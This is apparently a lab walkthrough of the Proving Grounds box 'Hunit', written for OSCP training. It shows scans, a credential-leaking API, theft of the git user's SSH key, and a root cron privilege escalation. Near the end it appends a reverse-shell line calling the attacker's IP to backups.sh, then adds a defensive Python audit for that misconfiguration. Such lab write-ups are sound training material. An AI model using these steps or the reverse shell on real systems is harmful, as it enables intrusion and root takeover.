Exploitation guide for Hunit | Proving Grounds
In this walkthrough we will get ssh access as a low-privileged user by exploiting an insecure API endpoint in the web application that discloses sensitive information. Then we will obtain the private ssh key of the git user, which has privileges to push updates to the master branch. With that key we will edit a script run by a root cronjob to get a reverse shell.
# Full TCP scan
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ nmap $ip -p- -T4 -vv -Pn
PORT STATE SERVICE REASON
4045/tcp closed lockd conn-refused
8080/tcp open http-proxy syn-ack
12445/tcp open unknown syn-ack
17466/tcp closed unknown conn-refused
18030/tcp open unknown syn-ack
25310/tcp closed unknown conn-refused
27045/tcp closed unknown conn-refused
29433/tcp closed unknown conn-refused
43022/tcp open unknown syn-ack
44376/tcp closed unknown conn-refused
46399/tcp closed unknown conn-refused
51704/tcp closed unknown conn-refused
56463/tcp closed unknown conn-refused
57098/tcp closed unknown conn-refused
# Detailed Scan on Open ports
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ nmap $ip -p8080,12445,18030,43022 -sVCT -oN nmapTCP.txt -Pn
PORT STATE SERVICE VERSION
8080/tcp open http-proxy
. . .
|_http-title: My Haikus
12445/tcp open netbios-ssn Samba smbd 4.6.2
18030/tcp open http Apache httpd 2.4.46 ((Unix))
. . .
43022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
. . .
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ smbclient -L \\$ip -U "" -N -p 12445
Sharename Type Comment
--------- ---- -------
Commander Disk Dademola Files
IPC$ IPC IPC Service (Samba 4.13.2)
SMB1 disabled -- no workgroup available
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ smbclient '//192.168.245.125/commander' -p 12445
Enter WORKGROUP\imtodess's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Nov 6 13:11:27 2020
.. D 0 Fri Jan 15 12:58:49 2021
25_tailrec_function.kt N 479 Fri Nov 6 13:11:16 2020
30_abstract_class.kt N 822 Fri Nov 6 13:11:16 2020
48_lazy_keyword.kt N 861 Fri Nov 6 13:11:16 2020
24_infix_function.kt N 528 Fri Nov 6 13:11:16 2020
. . .
Anonymous login is enabled and there are a bunch of files. Two http services are running on the system (ports 8080 and 18030).
Note: I tried fuzzing directories but found nothing. Nikto also found nothing to take note of.
Looking at the source code of the articles we find a comment with an API endpoint. Sending a request to /api/ gives us the following response. Now send another request to /api/user/.
{
"login":"dademola",
"password":"<password_redacted>",
"firstname":"Derik",
"lastname":"Ademola",
"description":"Admin",
"id":6
},
We get a response with a bunch of information, including usernames and passwords. Among them is one user with admin privileges. We will use that credential to log in over ssh.
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ ssh dademola@192.168.245.125 -p 43022
dademola@192.168.245.125's password:
[dademola@hunit ~]$ whoami
dademola
[dademola@hunit ~]$ ls
blog.jar local.txt shared
[dademola@hunit ~]$ cat local.txt
3cd0<...Redacted...>f2a727
There is a backup of a crontab which tells us about cronjobs that run as root every 3 and 2 minutes.
[dademola@hunit ~]$ cat /etc/crontab.bak
*/3 * * * * /root/git-server/backups.sh
*/2 * * * * /root/pull.sh
We find ssh keys in the home folder of the git user.
[dademola@hunit ~]$ cd ../git/
[dademola@hunit git]$ ls
git-shell-commands
[dademola@hunit git]$ ls -la
total 28
drwxr-xr-x 4 git git 4096 Nov 5 2020 .
drwxr-xr-x 4 root root 4096 Nov 5 2020 ..
-rw------- 1 git git 0 Jan 15 2021 .bash_history
-rw-r--r-- 1 git git 21 Aug 9 2020 .bash_logout
-rw-r--r-- 1 git git 57 Aug 9 2020 .bash_profile
-rw-r--r-- 1 git git 141 Aug 9 2020 .bashrc
drwxr-xr-x 2 git git 4096 Nov 5 2020 .ssh
drwxr-xr-x 2 git git 4096 Nov 5 2020 git-shell-commands
[dademola@hunit git]$ cd .ssh/
[dademola@hunit .ssh]$ ls
authorized_keys id_rsa id_rsa.pub
We will copy id_rsa to the shared folder, which can be accessed over smb.
[dademola@hunit .ssh]$ cp id_rsa ../../dademola/shared/
Now download the file to your local machine and change the permissions of the key.
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ smbclient '//192.168.245.125/commander' -p 12445
Enter WORKGROUP\imtodess's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> get id_rsa
getting file \id_rsa of size 2590 as id_rsa (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \> exit
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hunit/loot]
└─$ chmod 600 id_rsa
Using the private ssh key we can log in to the restricted git shell.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hunit/loot]
└─$ ssh -i id_rsa git@192.168.245.125 -p 43022
Last login: Tue Aug 24 12:30:40 2021 from 192.168.49.245
git>
Clone the repo to your machine.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hunit/exploits]
└─$ GIT_SSH_COMMAND='ssh -i ../loot/id_rsa -p 43022' git clone git@192.168.254.125:/git-server
Cloning into 'git-server'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 12 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (12/12), done.
Resolving deltas: 100% (2/2), done.
Add the following reverse shell payload to the script and make it executable.
# edit the IP and port as needed
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ echo "sh -i >& /dev/tcp/192.168.49.154/18030 0>&1" >> backups.sh
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ chmod +x backups.sh
Now push the commit to the master branch.
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ git add -A
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ git commit -m "PE"
[master f4a83c4] PE
1 file changed, 1 insertion(+)
mode change 100644 => 100755 backups.sh
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ GIT_SSH_COMMAND='ssh -i ../../loot/id_rsa -p 43022' git push origin master
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 4 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 373 bytes | 373.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
To 192.168.245.125:/git-server
b50f4e5..f4a83c4 master -> master
After 5 minutes we will have a shell as root.
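The chain above works because root's cron executes a script out of a git checkout that the git user can push to, and because the git user's private key sat in a world-traversable .ssh directory and was readable by another local user. As an added example, not part of the original walkthrough, here is a small Python audit that flags both conditions; it recreates the box's layout under a temporary directory (a constructed stand-in, with id_rsa assumed to be mode 0644 since dademola could copy it) and parses the crontab entries quoted above.

```python
import os
import tempfile

# Constructed crontab text, modelled on the /etc/crontab.bak entries shown above.
SAMPLE_CRONTAB = "*/3 * * * * /root/git-server/backups.sh\n*/2 * * * * /root/pull.sh\n"

def cron_commands(crontab_text):
    """Return the command path (6th field) of every active crontab entry."""
    return [f[5] for f in (line.split() for line in crontab_text.splitlines())
            if len(f) >= 6 and not f[0].startswith("#")]

def audit_cron_script(path, top="/"):
    """Flag a cron script inside a git working tree: whoever can push controls what root runs."""
    findings, d = [], os.path.dirname(path)
    while d.startswith(top):  # walk up towards `top` looking for a .git directory
        if os.path.isdir(os.path.join(d, ".git")):
            findings.append("run-from-git-checkout")
            break
        if d == top:
            break
        d = os.path.dirname(d)
    return findings

def audit_private_key(path):
    """Flag an SSH private key, or its .ssh directory, that other users can reach."""
    findings = []
    if os.stat(path).st_mode & 0o077:  # group/other have any access to the key
        findings.append("key-readable-by-others")
    if os.stat(os.path.dirname(path)).st_mode & 0o011:  # group/other can enter .ssh
        findings.append("ssh-dir-enterable-by-others")
    return findings

def build_demo_tree():
    """Recreate the box's layout under a tempdir (a constructed stand-in, not the host)."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "root/git-server/.git"))
    os.makedirs(os.path.join(base, "home/git/.ssh"))
    os.chmod(os.path.join(base, "home/git/.ssh"), 0o755)  # drwxr-xr-x, as in the listing
    for rel, mode in (("root/git-server/backups.sh", 0o755), ("root/pull.sh", 0o700),
                      ("home/git/.ssh/id_rsa", 0o644)):  # 0644 is an assumed mode
        with open(os.path.join(base, rel), "w") as f:
            f.write("# constructed placeholder\n")
        os.chmod(os.path.join(base, rel), mode)
    return base

def run_audit(base, crontab_text=SAMPLE_CRONTAB):
    """Map each cron script and the git user's key to its findings, treating `base` as /."""
    report = {c: audit_cron_script(base + c, top=base) for c in cron_commands(crontab_text)}
    report["/home/git/.ssh/id_rsa"] = audit_private_key(base + "/home/git/.ssh/id_rsa")
    return report
```

Run `run_audit(build_demo_tree())` to see the report; on a real host you would call the audit functions with `top="/"` against the live crontab and each user's ~/.ssh instead of the constructed tree.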